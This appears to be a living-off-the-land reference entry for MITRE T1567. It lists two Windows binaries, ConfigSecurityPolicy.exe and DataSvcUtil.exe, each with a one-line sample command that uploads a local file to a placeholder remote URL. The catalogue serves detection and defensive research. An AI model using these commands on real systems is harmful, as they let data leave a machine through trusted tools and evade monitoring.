T1567: Technique T1567
Adversaries may leverage living-off-the-land techniques (T1567) to achieve execution, evade defenses, or transfer tools.
Total Capable Binaries: 2
•
Windows: 2
•
Linux: 0
•
macOS: 0
Living-off-the-Land Matrix for T1567
Across 2 verified binariesWindows2 payloads
ConfigSecurityPolicy.exe
Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Sample Attack Vector:
ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}Windows1 payloads
DataSvcUtil.exe
DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Sample Attack Vector:
DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point